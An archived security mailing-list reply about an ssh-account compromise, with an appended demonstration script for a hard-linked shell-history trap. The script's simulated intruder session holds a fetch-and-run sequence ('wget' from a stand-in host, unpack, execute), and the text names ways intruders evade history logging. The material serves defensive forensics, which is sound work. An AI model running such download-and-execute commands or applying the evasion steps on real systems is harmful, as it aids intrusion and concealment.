Message-ID: <1093542315.541.32.camel@localhost>
From: frank at knobbe.us (Frank Knobbe)
Subject: Automated ssh scanning
On Wed, 2004-08-25 at 17:32, Richard Verwayen wrote:
> The attackers installed some software and irc-bots and tried to use this
> host for testing other computers, that's not the point. I would like to
> know where's the weak point in the system? As the system was updated on
> a daily basis! The only known weakness were these two accounts!
How do you know what they brought in? Do you have shell history files
available? Care to share them with us? Shell history (if left over)
should give a clue to not just what they brought in, but also how
they used it. That will answer your question as to what local root
exploit they used.
If you don't have shell history files left over, try repeating the
experiment with .history hard-linked to something like
.opera/adprefs.ini (create other .opera/ files as cover). Once they
clean up and delete the .history file, you should be left with a copy in
.opera/adprefs.ini. (Depending on the clue level of the script kiddie he
may not find the linked copy).
If you do have .history content, or other log info, please share it here
with us.
Regards,
Frank
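The hard-link trick described above, as an added example that is not part of the original post. It runs in a throwaway directory from mktemp rather than a real home, the intruder's commands are constructed sample lines, and the .history and .opera/adprefs.ini names are taken from the mail as assumptions (substitute whatever history file the host's shell actually writes, e.g. .bash_history for bash). It also shows the failure mode: a hard link shares one inode, so truncating the file empties the hidden copy as well, whereas deleting the name does not.

```shell
#!/bin/sh
# Added example (not from the original post): the hard-linked-history trick
# in a scratch directory. File names follow the mail (.history,
# .opera/adprefs.ini) and are assumptions; the intruder commands are
# constructed sample lines.

# Create a fake home with .history hard-linked to .opera/adprefs.ini,
# plus a couple of empty cover files. Prints the scratch home path.
setup_linked_history() {
    home=$(mktemp -d)
    mkdir -p "$home/.opera"
    : > "$home/.history"
    ln "$home/.history" "$home/.opera/adprefs.ini"   # hard link, same inode
    : > "$home/.opera/opera6.ini"                     # cover files
    : > "$home/.opera/global.dat"
    echo "$home"
}

# Simulate the shell appending the intruder's commands to .history
# (constructed sample lines; the host name is deliberately invalid).
simulate_session() {
    printf '%s\n' \
        'wget http://example.invalid/x.tgz' \
        'tar xzf x.tgz' \
        './x' >> "$1/.history"
}

# Link count of a file: 2 means the hidden copy is still attached.
# (ls -l column 2 is the link count and is portable; GNU stat -c %h also works.)
link_count() {
    ls -ld "$1" | awk '{print $2}'
}

# Cleanup style 1: intruder removes the file name. The inode survives
# because .opera/adprefs.ini still references it.
intruder_rm() {
    rm -f "$1/.history"
}

# Cleanup style 2: intruder truncates in place (e.g. "> .history").
# Both names share the inode, so the hidden copy is emptied too.
intruder_truncate() {
    : > "$1/.history"
}

# Lines recoverable from the hidden copy.
recovered_lines() {
    wc -l < "$1/.opera/adprefs.ini" | tr -d ' '
}

# Run the whole scenario for one cleanup method (rm|truncate) and print
# how many history lines survive in the hidden copy.
run_scenario() {
    h=$(setup_linked_history)
    simulate_session "$h"
    case "$1" in
        rm)       intruder_rm "$h" ;;
        truncate) intruder_truncate "$h" ;;
        *)        echo "unknown method: $1" >&2; rm -rf "$h"; return 1 ;;
    esac
    recovered_lines "$h"
    rm -rf "$h"
}

# Stand-alone demo of both outcomes.
echo "recovered after rm:       $(run_scenario rm) lines"
echo "recovered after truncate: $(run_scenario truncate) lines"
```

Two caveats worth keeping in mind: the shell only writes the history file at logout, so an intruder who does `unset HISTFILE` (or points it at /dev/null) before doing anything leaves nothing to link, and `ls -l` in the home directory shows the link count as 2, which a more careful visitor may notice. Hard links also have to stay on one filesystem, so keep the copy under the same home directory.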